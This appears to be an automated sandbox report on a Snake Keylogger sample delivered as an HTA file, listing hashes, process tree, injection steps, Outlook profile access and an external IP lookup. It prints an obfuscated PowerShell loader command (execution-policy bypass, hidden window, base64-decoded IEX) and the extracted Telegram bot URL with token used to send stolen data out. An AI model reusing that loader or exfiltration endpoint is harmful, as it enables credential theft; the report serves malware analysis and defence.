Analysis
-
max time kernel
240s -
max time network
243s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64 arch:x86 image:win7-20240729-en locale:en-us os:windows7-x64 system -
submitted
16/10/2024, 01:40
Static task
static1
Behavioral task
behavioral1
Sample
16102024_0140_niceworkingprojectforeveryone.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
16102024_0140_niceworkingprojectforeveryone.hta
Resource
win10v2004-20241007-en
General
-
Target
16102024_0140_niceworkingprojectforeveryone.hta
-
Size
165KB
-
MD5
44ad3c49b38f4f6f1739baf86d528fd3
-
SHA1
afcf27df0ee2373846a1f6b8027e9cfcea77c486
-
SHA256
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
-
SHA512
e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
-
SSDEEP
96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource | yara_rule
behavioral1/memory/2440-36-0x0000000000400000-0x0000000000426000-memory.dmp | family_snakekeylogger
behavioral1/memory/2440-35-0x0000000000400000-0x0000000000426000-memory.dmp | family_snakekeylogger
behavioral1/memory/2440-34-0x0000000000400000-0x0000000000426000-memory.dmp | family_snakekeylogger
-
Blocklisted process makes network request 1 IoCs
flow | pid | Process
3 | 2316 | PoweRsHELl.ExE
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid | Process
2316 | PoweRsHELl.ExE
2824 | powershell.exe
-
Executes dropped EXE 1 IoCs
pid | Process
2896 | taskhostw.exe
-
Loads dropped DLL 1 IoCs
pid | Process
2316 | PoweRsHELl.ExE
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
5 | checkip.dyndns.org
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x003000000001939b-26.dat | autoit_exe
-
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2896 set thread context of 2440 | 2896 | taskhostw.exe | 36
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskhostw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegSvcs.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | PoweRsHELl.ExE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
-
Modifies Internet Explorer settings 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid | Process
2316 | PoweRsHELl.ExE
2824 | powershell.exe
2316 | PoweRsHELl.ExE
2316 | PoweRsHELl.ExE
2440 | RegSvcs.exe
2440 | RegSvcs.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
2896 | taskhostw.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2316 | PoweRsHELl.ExE
Token: SeDebugPrivilege | 2824 | powershell.exe
Token: SeDebugPrivilege | 2440 | RegSvcs.exe
-
Suspicious use of WriteProcessMemory 28 IoCs
description | pid | Process | procid_target
PID 2528 wrote to memory of 2316 | 2528 | mshta.exe | 29
PID 2528 wrote to memory of 2316 | 2528 | mshta.exe | 29
PID 2528 wrote to memory of 2316 | 2528 | mshta.exe | 29
PID 2528 wrote to memory of 2316 | 2528 | mshta.exe | 29
PID 2316 wrote to memory of 2824 | 2316 | PoweRsHELl.ExE | 31
PID 2316 wrote to memory of 2824 | 2316 | PoweRsHELl.ExE | 31
PID 2316 wrote to memory of 2824 | 2316 | PoweRsHELl.ExE | 31
PID 2316 wrote to memory of 2824 | 2316 | PoweRsHELl.ExE | 31
PID 2316 wrote to memory of 2868 | 2316 | PoweRsHELl.ExE | 32
PID 2316 wrote to memory of 2868 | 2316 | PoweRsHELl.ExE | 32
PID 2316 wrote to memory of 2868 | 2316 | PoweRsHELl.ExE | 32
PID 2316 wrote to memory of 2868 | 2316 | PoweRsHELl.ExE | 32
PID 2868 wrote to memory of 2772 | 2868 | csc.exe | 33
PID 2868 wrote to memory of 2772 | 2868 | csc.exe | 33
PID 2868 wrote to memory of 2772 | 2868 | csc.exe | 33
PID 2868 wrote to memory of 2772 | 2868 | csc.exe | 33
PID 2316 wrote to memory of 2896 | 2316 | PoweRsHELl.ExE | 35
PID 2316 wrote to memory of 2896 | 2316 | PoweRsHELl.ExE | 35
PID 2316 wrote to memory of 2896 | 2316 | PoweRsHELl.ExE | 35
PID 2316 wrote to memory of 2896 | 2316 | PoweRsHELl.ExE | 35
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
PID 2896 wrote to memory of 2440 | 2896 | taskhostw.exe | 36
-
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
-
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe (tree level 1)
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta"
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE (tree level 2)
"C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'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'+[CHAR]0x22+'))')))"
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (tree level 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (tree level 3)
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3erzvzu.cmdline"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (tree level 4)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8602.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8601.tmp"
- System Location Discovery: System Language Discovery
PID:2772
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe (tree level 3)
"C:\Users\Admin\AppData\Roaming\taskhostw.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (tree level 4)
"C:\Users\Admin\AppData\Roaming\taskhostw.exe"
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2440
-
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
1KB
MD5 95620a347d51db77f4a5c57a6b1b840e
SHA1 6d7f9ef008c97b0a20d1411a446bfe14e2abb81c
SHA256 6562885a0315b918541689be9239a14fd4c44e3d53a5b544bce398682680fe5f
SHA512 a9edb4bb78916cd394946f73a8dbea798ac1fb3063df84dcbf97b341778445b438a303d8ed70f5ff3eb350e57cbef2731315b70d6b5ddaec70bfc10d62898224
-
Filesize
3KB
MD5 5c337f847566d92b9f38ce0f4c0cc8f3
SHA1 8ba8640810bbdfa72f02b1e55737bfffab49203a
SHA256 4a0a9201c590012f7a8e38cd42c220853f573c219fe48bea13aee7782cb92312
SHA512 b6adb63b0f933c3d408e99e591117e4926183276a923ad2428ce12d53f08824a338650046d2c35803b182da7a83a83b6f6df8f5b0b23491029269de7ba588557
-
Filesize
7KB
MD5 2822de9663d6b2e4e0d911419c587a27
SHA1 6057202b17f53918cbc8efa925ed8d2cdd6723ea
SHA256 a79b6312d75f66ee9e5ccca0ea8b001f9db211c6d21c05fea9d4eb788fe7a67e
SHA512 3797e6161f4fdac62939385ed75e8384e3c1bae9ee5d06c2444f631f632fdc7d5d8a5a68be5d0cd1d1fc1ca782ea5ff302ad3e5e4ca3b3bb59c0bb03abf861a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB
MD5 aa159bd2e415cfd34e1f0815b05a246c
SHA1 a5076713116fa301c5f749a1b646a01db936a3b1
SHA256 ac7cdf7431b28953388ed21f99645cdc15ebe1efda468545a95876b0224e661f
SHA512 3f6e0f23ef4b3bc2201029efd0376ea9f8ed370ce8fcbc38d6171e33556c59fc5645618d88ed11f062c6f2158db67c4c1e40da382ae985dc6668eeb08d9d7b78
-
Filesize
948KB
MD5 3e2f27edd3deacd8f08f6ed1133b2040
SHA1 060e3218949c5a006bb8607e8228e6539b737bfb
SHA256 163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
SHA512 da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
-
Filesize
652B
MD5 b6578b91401729f486ddc70ef092c351
SHA1 9920c39989cf48f106a98a9092ede1816f90eff1
SHA256 bb0261b231cc16054f6cb81eee13f60aa45bd2040b2404b51f49860fae1e1d08
SHA512 72623414964a4862cbfd45fe27efd972458ba9ca3cc36b41894f08f3693acd246a51fcb7d003ed8a1d2a732df0d07a05457f4cffaeba3f02970eac549870c47b
-
Filesize
475B
MD5 ecc2c10cb4c5954e2d5156bce54e41f4
SHA1 2d7cde31f9942c1dc80c493c03d675962991bf31
SHA256 21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
SHA512 bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
-
Filesize
309B
MD5 a35aa4e335fdf2563f4fa23cf3d49f11
SHA1 62d90fa02d4a8a0a4952aa648ef61f296b09d6cf
SHA256 5507d350a25c56f0fb3b2ee88c8bb50a258f86ec4385fa70bf74fb5cad4dfa61
SHA512 53ff64f8ae3c4a605353ebb7de123c7468613b9afc31d5e09ad01d9022bd2fad3369e7026e3df128935059bd95f6e3607e94d3fb4227ea28d496b3010a256ed8